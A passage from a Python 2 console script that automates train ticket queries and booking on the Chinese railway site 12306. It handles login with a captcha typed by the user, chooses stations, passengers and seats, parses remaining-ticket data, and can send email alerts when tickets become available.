i + 2, available_date[i + 1].strftime(fmt), week_days[available_date[i + 1].weekday()]))
else:
print('')
while True:
print(u'请选择乘车日期(1~%d)' % (MAX_DAYS))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index = int(index)
if index < 1 or index > MAX_DAYS:
print(u'输入的序号无效, 请重新选择乘车日期(1~%d)' % (MAX_DAYS))
continue
index -= 1
train_date = available_date[index].strftime(fmt)
return train_date
def getStationByName(name):
matched_stations = []
for station in stations:
if (
station['name'] == name
or station['abbr'].find(name.lower()) != -1
or station['pinyin'].find(name.lower()) != -1
or station['pyabbr'].find(name.lower()) != -1):
matched_stations.append(station)
count = len(matched_stations)
if count <= 0:
return None
elif count == 1:
return matched_stations[0]
else:
for i in xrange(0, count):
print(u'%d:\t%s' % (i + 1, matched_stations[i]['name']))
print(u'请选择站点(1~%d)' % (count))
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号(1~%d)' % (count))
return None
index = int(index)
if index < 1 or index > count:
print(u'输入的序号无效(1~%d)' % (count))
return None
else:
return matched_stations[index - 1]
def inputStation():
while True:
print(u'支持中文, 拼音和拼音缩写(如: 北京,beijing,bj)')
name = raw_input().decode('gb2312', 'ignore')
station = getStationByName(name)
if station:
return station
else:
print(u'站点错误, 没有站点"%s", 请重新输入.' % (name))
def selectTrain(trains):
trains_num = len(trains)
index = 0
while True: # 必须选择有效的车次
index = raw_input()
if not index.isdigit():
print(u'只能输入数字序号,请重新选择车次(1~%d)' % (trains_num))
continue
index = int(index)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
continue
if trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (
trains[index - 1]['queryLeftNewDTO']['station_train_code']))
continue
else:
break
return index
class MyOrder(object):
'''docstring for MyOrder'''
def __init__(
self,
username='',
password='',
train_date='',
from_city_name='',
to_city_name=''):
super(MyOrder, self).__init__()
self.username = username # 账号
self.password = password # 密码
self.train_date = train_date # 乘车日期[2014-01-01]
today = datetime.datetime.now()
self.back_train_date = today.strftime('%Y-%m-%d') # 返程日期[2014-01-01]
self.tour_flag = 'dc' # 单程dc/往返wf
self.purpose_code = 'ADULT' # 成人票
self.from_city_name = from_city_name # 对应查询界面'出发地'输入框中的内容
self.to_city_name = to_city_name # 对应查询界面'目的地'输入框中的内容
self.from_station_telecode = '' # 出发站编码
self.to_station_telecode = '' # 目的站编码
self.passengers = [] # 乘车人列表,最多5人
self.normal_passengers = [] # 我的联系人列表
self.trains = [] # 列车列表, 查询余票后自动更新
self.current_train_index = 0 # 当前选中的列车索引序号
self.captcha = '' # 图片验证码
self.orderId = '' # 订单流水号
self.canWebBuy = False # 可预订
self.notify = {
'mail_enable': 0,
'mail_username': '',
'mail_password': '',
'mail_server': '',
'mail_to': [],
'dates': [],
'trains': [],
'xb': [],
'focus': {}
}
def initSession(self):
self.session = requests.Session()
self.session.headers = {
'Accept': 'application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Host': 'kyfw.12306.cn',
'Connection': 'Keep-Alive'
}
def updateHeaders(self, url):
d = {
'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/login/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
},
'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/loginAysnSuggest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/login/userLogin': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/index/init': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/login/init'
},
'https://kyfw.12306.cn/otn/leftTicket/init': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/index/init',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/leftTicket/log?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/query?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/leftTicket/queryT?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'x-requested-with': 'XMLHttpRequest',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0'
},
'https://kyfw.12306.cn/otn/login/checkUser': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Cache-Control': 'no-cache',
'If-Modified-Since': '0',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/initDc': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/leftTicket/init',
'Content-Type': 'application/x-www-form-urlencoded',
'Cache-Control': 'no-cache'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/checkOrderInfo': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/getQueueCount': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'x-requested-with': 'XMLHttpRequest'
},
'https://kyfw.12306.cn/otn/confirmPassenger/resultOrderForDcQueue': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'https://kyfw.12306.cn/otn//payOrder/init?': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc',
'Cache-Control': 'no-cache',
'Content-Type': 'application/x-www-form-urlencoded'
},
'https://kyfw.12306.cn/otn/queryOrder/initNoComplete': {
'method': 'GET',
'Referer': 'https://kyfw.12306.cn/otn//payOrder/init?random=1417862054369'
},
'https://kyfw.12306.cn/otn/queryOrder/queryMyOrderNoComplete': {
'method': 'POST',
'Referer': 'https://kyfw.12306.cn/otn/queryOrder/initNoComplete',
'Cache-Control': 'no-cache',
'x-requested-with': 'XMLHttpRequest',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
}
}
l = [
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=login&rand=sjrand&',
'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=passenger&rand=randp&',
'https://kyfw.12306.cn/otn/leftTicket/log?',
'https://kyfw.12306.cn/otn/leftTicket/query?',
'https://kyfw.12306.cn/otn/leftTicket/queryT?',
'https://kyfw.12306.cn/otn/confirmPassenger/queryOrderWaitTime?',
'https://kyfw.12306.cn/otn//payOrder/init?'
]
for s in l:
if url.find(s) == 0:
url = s
if not url in d:
print(u'未知 url: %s' % url)
return RET_ERR
self.session.headers.update({'Referer': d[url]['Referer']})
keys = [
'Referer',
'Cache-Control',
'x-requested-with',
'Content-Type'
]
for key in keys:
if key in d[url]:
self.session.headers.update({key: d[url][key]})
else:
self.session.headers.update({key: None})
def get(self, url):
self.updateHeaders(url)
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.get(url, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def post(self, url, payload):
self.updateHeaders(url)
if url == 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn':
if payload.find('REPEAT_SUBMIT_TOKEN') != -1:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'})
else:
self.session.headers.update({'Referer': 'https://kyfw.12306.cn/otn/login/init'})
tries = 0
while tries < MAX_TRIES:
tries += 1
try:
r = self.session.post(url, data=payload, verify=False, timeout=16)
except requests.exceptions.ConnectionError as e:
print('ConnectionError(%s): e=%s' % (url, e))
continue
except requests.exceptions.Timeout as e:
print('Timeout(%s): e=%s' % (url, e))
continue
except requests.exceptions.TooManyRedirects as e:
print('TooManyRedirects(%s): e=%s' % (url, e))
continue
except requests.exceptions.HTTPError as e:
print('HTTPError(%s): e=%s' % (url, e))
continue
except requests.exceptions.RequestException as e:
print('RequestException(%s): e=%s' % (url, e))
continue
except:
print('Unknown exception(%s)' % (url))
continue
if r.status_code != 200:
print('Request %s failed %d times, status_code=%d' % (
url,
tries,
r.status_code))
else:
return r
else:
return None
def getCaptcha(self, url):
self.updateHeaders(url)
r = self.session.get(url, verify=False, stream=True, timeout=16)
with open('captcha.gif', 'wb') as fd:
for chunk in r.iter_content():
fd.write(chunk)
print(u'请输入4位图片验证码(回车刷新验证码):')
captcha = raw_input()
if len(captcha) == 4:
return captcha
elif len(captcha) != 0:
print(u'%s是无效的图片验证码, 必须是4位' % (captcha))
return None
else:
return 1 # 刷新
def initStation(self):
url = 'https://kyfw.12306.cn/otn/resources/js/framework/station_name.js'
r = self.get(url)
if not r:
print(u'站点数据库初始化失败, 请求异常')
return None
data = r.text
station_list = data.split('@')
if len(station_list) < 1:
print(u'站点数据库初始化失败, 数据异常')
return None
station_list = station_list[1:]
for station in station_list:
items = station.split('|') # bji|北京|BJP|beijing|bj|2
if len(items) < 5:
print(u'忽略无效站点: %s' % (items))
continue
stations.append({'abbr': items[0],
'name': items[1],
'telecode': items[2],
'pinyin': items[3],
'pyabbr': items[4]})
return stations
def readConfig(self, config_file='config.ini'):
cp = ConfigParser.ConfigParser()
try:
cp.readfp(open(config_file, 'r'))
except IOError as e:
print(u'打开配置文件"%s"失败啦, 请先创建或者拷贝一份配置文件config.ini' % (config_file))
raw_input('Press any key to continue')
sys.exit()
self.username = cp.get('login', 'username')
self.password = cp.get('login', 'password')
self.train_date = cp.get('train', 'date')
self.from_city_name = cp.get('train', 'from')
self.to_city_name = cp.get('train', 'to')
self.notify['mail_enable'] = int(cp.get('notify', 'mail_enable'))
self.notify['mail_username'] = cp.get('notify', 'mail_username')
self.notify['mail_password'] = cp.get('notify', 'mail_password')
self.notify['mail_server'] = cp.get('notify', 'mail_server')
self.notify['mail_to'] = cp.get('notify', 'mail_to').split(',')
self.notify['dates'] = cp.get('notify', 'dates').split(',')
self.notify['trains'] = cp.get('notify', 'trains').split(',')
self.notify['xb'] = cp.get('notify', 'xb').split(',')
for t in self.notify['trains']:
self.notify['focus'][t] = self.notify['xb']
# 检查出发站
station = getStationByName(self.from_city_name)
if not station:
print(u'出发站错误, 请重新输入')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
# 检查目的站
station = getStationByName(self.to_city_name)
if not station:
print(u'目的站错误,请重新输入')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
# 检查乘车日期
if not checkDate(self.train_date):
print(u'乘车日期无效, 请重新选择')
self.train_date = selectDate()
# 分析乘客信息
self.passengers = []
index = 1
passenger_sections = ['passenger%d' % (i) for i in xrange(1, 6)]
sections = cp.sections()
for section in passenger_sections:
if section in sections:
passenger = {}
passenger['index'] = index
passenger['name'] = cp.get(section, 'name') # 必选参数
passenger['cardtype'] = cp.get(
section,
'cardtype') if cp.has_option(
section,
'cardtype') else '1' # 证件类型:可选参数,默认值1,即二代身份证
passenger['id'] = cp.get(section, 'id') # 必选参数
passenger['phone'] = cp.get(
section,
'phone') if cp.has_option(
section,
'phone') else '13800138000' # 手机号码
passenger['seattype'] = cp.get(
section,
'seattype') if cp.has_option(
section,
'seattype') else '1' # 席别:可选参数, 默认值1, 即硬座
passenger['tickettype'] = cp.get(
section,
'tickettype') if cp.has_option(
section,
'tickettype') else '1' # 票种:可选参数, 默认值1, 即成人票
self.passengers.append(passenger)
index += 1
def printConfig(self):
printDelimiter()
print(u'订票信息:\n%s\t%s\t%s--->%s' % (
self.username,
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
th = [u'序号', u'姓名', u'证件类型', u'证件号码', u'席别', u'票种']
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
th[0].ljust(2), th[1].ljust(4), th[2].ljust(5),
th[3].ljust(12), th[4].ljust(2), th[5].ljust(3)))
for p in self.passengers:
print(u'%s\t%s\t%s\t%s\t%s\t%s' % (
p['index'],
p['name'].decode('utf-8', 'ignore').ljust(4),
getCardType(p['cardtype']).ljust(5),
p['id'].ljust(20),
getSeatType(p['seattype']).ljust(2),
getTicketType(p['tickettype']).ljust(3)))
def checkRandCodeAnsyn(self, module):
d = {
'login': { # 登陆验证码
'rand': 'sjrand',
'referer': 'https://kyfw.12306.cn/otn/login/init'
},
'passenger': { # 订单验证码
'rand': 'randp',
'referer': 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
}
}
if not module in d:
print(u'无效的 module: %s' % (module))
return RET_ERR
tries = 0
while tries < MAX_TRIES:
tries += 1
url = 'https://kyfw.12306.cn/otn/passcodeNew/getPassCodeNew?module=%s&rand=%s&' % (module, d[module]['rand'])
if tries > 1:
url = '%s%1.16f' % (url, random.random())
print(u'正在等待验证码...')
self.captcha = self.getCaptcha(url)
if not self.captcha:
continue
if self.captcha == 1: # 刷新不计数
tries -= 1
continue
url = 'https://kyfw.12306.cn/otn/passcodeNew/checkRandCodeAnsyn'
parameters = [
('randCode', self.captcha),
('rand', d[module]['rand'])
]
if module == 'login':
parameters.append(('randCode_validate', ''))
else:
parameters.append(('_json_att', ''))
parameters.append(('REPEAT_SUBMIT_TOKEN', self.repeatSubmitToken))
payload = urllib.urlencode(parameters)
print(u'正在校验验证码...')
r = self.post(url, payload)
if not r:
print(u'校验验证码异常')
continue
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"result":"1","msg":"randCodeRight"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['result', 'msg'])
and (obj['data']['result'] == '1')):
print(u'校验验证码成功')
return RET_OK
else:
print(u'校验验证码失败')
dumpObj(obj)
continue
else:
return RET_ERR
def login(self):
url = 'https://kyfw.12306.cn/otn/login/init'
r = self.get(url)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
if self.session.cookies:
cookies = requests.utils.dict_from_cookiejar(self.session.cookies)
if cookies['JSESSIONID']:
self.jsessionid = cookies['JSESSIONID']
if self.checkRandCodeAnsyn('login') == RET_ERR:
return RET_ERR
print(u'正在登录...')
url = 'https://kyfw.12306.cn/otn/login/loginAysnSuggest'
parameters = [
('loginUserDTO.user_name', self.username),
('userDTO.password', self.password),
('randCode', self.captcha),
('randCode_validate', ''),
#('ODg3NzQ0', 'OTIyNmFhNmQwNmI5ZmQ2OA%3D%3D'),
('myversion', 'undefined')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'登录失败, 请求异常')
return RET_ERR
# {"validateMessagesShowId":"_validatorMessage","status":true,"httpstatus":200,"data":{"loginCheck":"Y"},"messages":[],"validateMessages":{}}
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['loginCheck'])
and (obj['data']['loginCheck'] == 'Y')):
print(u'登陆成功^_^')
url = 'https://kyfw.12306.cn/otn/login/userLogin'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
return RET_OK
else:
print(u'登陆失败啦!重新登陆...')
dumpObj(obj)
return RET_ERR
def getPassengerDTOs(self):
url = 'https://kyfw.12306.cn/otn/confirmPassenger/getPassengerDTOs'
parameters = [
('', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'获取乘客信息异常')
return RET_ERR
obj = r.json()
if (
hasKeys(obj, ['status', 'httpstatus', 'data'])
and hasKeys(obj['data'], ['normal_passengers'])
and obj['data']['normal_passengers']):
self.normal_passengers = obj['data']['normal_passengers']
return RET_OK
else:
print(u'获取乘客信息失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
if hasKeys(obj, ['data']) and hasKeys(obj['data'], ['exMsg']):
dumpObj(obj['data']['exMsg'])
return RET_ERR
def selectPassengers(self, prompt):
if prompt == 1:
print(u'是否重新选择乘客?(如需选择请输入y或者yes, 默认使用配置文件提供的乘客信息)')
act = raw_input()
act = act.lower()
if act != 'y' and act != 'yes':
self.printConfig()
return RET_OK
if not (self.normal_passengers and len(self.normal_passengers)):
tries = 0
while tries < MAX_TRIES:
tries += 1
if self.getPassengerDTOs() == RET_OK:
break
else:
print(u'获取乘客信息失败次数太多, 使用配置文件提供的乘客信息')
return RET_ERR
num = len(self.normal_passengers)
for i in xrange(0, num):
p = self.normal_passengers[i]
print(u'%d.%s \t' % (i + 1, p['passenger_name'])),
if (i + 1) % 5 == 0:
print('')
while True:
print(u'\n请选择乘车人(最多选择5个, 以逗号隔开, 如:1,2,3,4,5, 直接回车不选择, 使用配置文件中的乘客信息)')
buf = raw_input()
if not buf:
return RET_ERR
pattern = re.compile(r'^[0-9,]*\d$') # 只能输入数字和逗号, 并且必须以数字结束
if pattern.match(buf):
break
else:
print(u'输入格式错误, 只能输入数字和逗号, 并且必须以数字结束, 如:1,2,3,4,5')
ids = buf.split(',')
if not (ids and 1 <= len(ids) <= 5):
return RET_ERR
seattype = selectSeatType()
ids = [int(id) for id in ids]
del self.passengers[:]
for id in ids:
if id < 1 or id > num:
print(u'不存在的联系人, 忽略')
else:
passenger = {}
id = id - 1
passenger['index'] = len(self.passengers) + 1
passenger['name'] = self.normal_passengers[id]['passenger_name']
passenger['cardtype'] = self.normal_passengers[id]['passenger_id_type_code']
passenger['id'] = self.normal_passengers[id]['passenger_id_no']
passenger['phone'] = self.normal_passengers[id]['mobile_no']
passenger['seattype'] = seattype
passenger['tickettype'] = self.normal_passengers[id]['passenger_type']
self.passengers.append(passenger)
self.printConfig()
return RET_OK
def queryTickets(self):
self.canWebBuy = False
url = 'https://kyfw.12306.cn/otn/leftTicket/init'
parameters = [
('_json_att', ''),
('leftTicketDTO.from_station_name', self.from_city_name),
('leftTicketDTO.to_station_name', self.to_city_name),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('leftTicketDTO.train_date', self.train_date),
('back_train_date', self.back_train_date),
('purpose_codes', self.purpose_code),
('pre_step_flag', 'index')
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/log?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
url = 'https://kyfw.12306.cn/otn/leftTicket/queryT?'
parameters = [
('leftTicketDTO.train_date', self.train_date),
('leftTicketDTO.from_station', self.from_station_telecode),
('leftTicketDTO.to_station', self.to_station_telecode),
('purpose_codes', self.purpose_code),
]
url += urllib.urlencode(parameters)
r = self.get(url)
if not r:
print(u'查询车票异常')
return RET_ERR
obj = r.json()
if (hasKeys(obj, ['status', 'httpstatus', 'data']) and len(obj['data'])):
self.trains = obj['data']
return RET_OK
else:
print(u'查询车票失败')
if hasKeys(obj, ['messages']):
dumpObj(obj['messages'])
return RET_ERR
def sendMailNotification(self):
print(u'正在发送邮件提醒...')
me = u'订票提醒<%s>' % (self.notify['mail_username'])
msg = MIMEText(
self.notify['mail_content'],
_subtype='plain',
_charset='gb2312')
msg['Subject'] = u'余票信息'
msg['From'] = me
msg['To'] = ';'.join(self.notify['mail_to'])
try:
server = smtplib.SMTP()
server.connect(self.notify['mail_server'])
server.login(
self.notify['mail_username'],
self.notify['mail_password'])
server.sendmail(me, self.notify['mail_to'], msg.as_string())
server.close()
print(u'发送邮件提醒成功')
return True
except Exception as e:
print(u'发送邮件提醒失败, %s' % str(e))
return False
def printTrains(self):
printDelimiter()
print(u'余票查询结果如下:')
print(u"%s\t%s--->%s\n'有':票源充足 '无':票已售完 '*':未到起售时间 '--':无此席别" % (
self.train_date,
self.from_city_name,
self.to_city_name))
printDelimiter()
print(u'序号/车次\t乘车站\t目的站\t一等\t二等\t软卧\t硬卧\t硬座\t无座')
seatTypeCode = {
'swz': '商务座',
'tz': '特等座',
'zy': '一等座',
'ze': '二等座',
'gr': '高级软卧',
'rw': '软卧',
'yw': '硬卧',
'rz': '软座',
'yz': '硬座',
'wz': '无座',
'qt': '其它',
}
# TODO 余票数量和票价 https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no=770000K77505&from_station_no=09&to_station_no=13&seat_types=1431&train_date=2014-01-01
# yp_info=4022300000301440004610078033421007800536 代表
# 4022300000 软卧0
# 3014400046 硬卧46
# 1007803342 无座342
# 1007800536 硬座536
index = 1
self.notify['mail_content'] = ''
for train in self.trains:
t = train['queryLeftNewDTO']
status = '售完' if t['canWebBuy'] == 'N' else '预定'
i = 0
ypInfo = {
'wz': { # 无座
'price': 0,
'left': 0
},
'yz': { # 硬座
'price': 0,
'left': 0
},
'yw': { # 硬卧
'price': 0,
'left': 0
},
'rw': { # 软卧
'price': 0,
'left': 0
},
}
# 分析票价和余票数量
while i < (len(t['yp_info']) / 10):
tmp = t['yp_info'][i * 10:(i + 1) * 10]
price = int(tmp[1:5])
left = int(tmp[-3:])
if tmp[0] == '1':
if tmp[6] == '3':
ypInfo['wz']['price'] = price
ypInfo['wz']['left'] = left
else:
ypInfo['yz']['price'] = price
ypInfo['yz']['left'] = left
elif tmp[0] == '3':
ypInfo['yw']['price'] = price
ypInfo['yw']['left'] = left
elif tmp[0] == '4':
ypInfo['rw']['price'] = price
ypInfo['rw']['left'] = left
i = i + 1
yz_price = u'硬座%s' % (
ypInfo['yz']['price']) if ypInfo['yz']['price'] else ''
yw_price = u'硬卧%s' % (
ypInfo['yw']['price']) if ypInfo['yw']['price'] else ''
print(u'(%d) %s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s' % (
index,
t['station_train_code'],
t['from_station_name'][0:3], # 最多保留3个中文
t['to_station_name'][0:3], # 最多保留3个中文
t['zy_num'],
t['ze_num'],
ypInfo['rw']['left'] if ypInfo['rw']['left'] else t['rw_num'],
ypInfo['yw']['left'] if ypInfo['yw']['left'] else t['yw_num'],
#t['rz_num'],
ypInfo['yz']['left'] if ypInfo['yz']['left'] else t['yz_num'],
ypInfo['wz']['left'] if ypInfo['wz']['left'] else t['wz_num'],
#yz_price,
#yw_price
))
if t['canWebBuy'] == 'Y':
self.canWebBuy = True
index += 1
if self.notify['mail_enable'] == 1 and t['canWebBuy'] == 'Y':
msg = ''
prefix = u'[%s]车次%s[%s/%s->%s/%s, 历时%s]现在有票啦\n' % (
t['start_train_date'],
t['station_train_code'],
t['from_station_name'],
t['start_time'],
t['to_station_name'],
t['arrive_time'],
t['lishi'])
if 'all' in self.notify['focus']: # 任意车次
if self.notify['focus']['all'][0] == 'all': # 任意席位
msg = prefix
else: # 指定席位
for seat in self.notify['focus']['all']:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
elif t['station_train_code'] in self.notify['focus']: # 指定车次
# 任意席位
if self.notify['focus'][t['station_train_code']][0] == 'all':
msg = prefix
else: # 指定席位
for seat in self.notify['focus'][t['station_train_code']]:
if seat in ypInfo and ypInfo[seat]['left']:
msg += u'座位类型:%s, 剩余车票数量:%s, 票价:%s \n' % (
seat if seat not in seatTypeCode else seatTypeCode[seat],
ypInfo[seat]['left'],
ypInfo[seat]['price'])
if msg:
msg = prefix + msg + u'\n'
self.notify['mail_content'] += msg
printDelimiter()
if self.notify['mail_enable'] == 1:
if self.notify['mail_content']:
self.sendMailNotification()
return RET_OK
else:
length = len(self.notify['dates'])
if length > 1:
self.train_date = self.notify['dates'][
random.randint(
0,
length -
1)]
return RET_ERR
else:
return RET_OK
# -1->重新查询/0->退出程序/1~len->车次序号
def selectAction(self):
ret = -1
self.current_train_index = 0
trains_num = len(self.trains)
print(u'您可以选择:')
if self.canWebBuy:
print(u'1~%d.选择车次开始订票' % (trains_num))
print(u'p.更换乘车人')
print(u's.更改席别')
print(u'd.更改乘车日期')
print(u'f.更改出发站')
print(u't.更改目的站')
print(u'a.同时更改乘车日期,出发站和目的站')
print(u'u.查询未完成订单')
print(u'c.查看订票信息')
print(u'r.刷票模式')
print(u'n.普通模式')
print(u'q.退出')
print(u'刷新车票请直接回车')
printDelimiter()
select = raw_input()
select = select.lower()
if select.isdigit():
if not self.canWebBuy:
print(u'没有可预订的车次, 请刷新车票或者更改查询条件')
return -1
index = int(select)
if index < 1 or index > trains_num:
print(u'输入的序号无效,请重新选择车次(1~%d)' % (trains_num))
index = selectTrain(self.trains)
if self.trains[index - 1]['queryLeftNewDTO']['canWebBuy'] != 'Y':
print(u'您选择的车次%s没票啦,请重新选择车次' % (self.trains[index - 1]['queryLeftNewDTO']['station_train_code']))
index = selectTrain(self.trains)
ret = index
self.current_train_index = index - 1
elif select == 'p':
self.selectPassengers(0)
elif select == 's':
seattype = selectSeatType()
for p in self.passengers:
p['seattype'] = seattype
self.printConfig()
elif select == 'd':
self.train_date = selectDate()
elif select == 'f':
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
elif select == 't':
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'a':
self.train_date = selectDate()
print(u'请输入出发站:')
station = inputStation()
self.from_city_name = station['name']
self.from_station_telecode = station['telecode']
print(u'请输入目的站:')
station = inputStation()
self.to_city_name = station['name']
self.to_station_telecode = station['telecode']
elif select == 'u':
ret = self.queryMyOrderNotComplete()
ret = self.selectAction()
elif select == 'c':
ret = self.printConfig()
ret = self.selectAction()
elif select == 'r':
self.notify['mail_enable'] = 1
ret = -1
elif select == 'n':
self.notify['mail_enable'] = 0
ret = -1
elif select == 'q':
ret = 0
return ret
def initOrder(self):
url = 'https://kyfw.12306.cn/otn/login/checkUser'
parameters = [
('_json_att', ''),
]
payload = urllib.urlencode(parameters)
r = self.post(url, payload)
if not r:
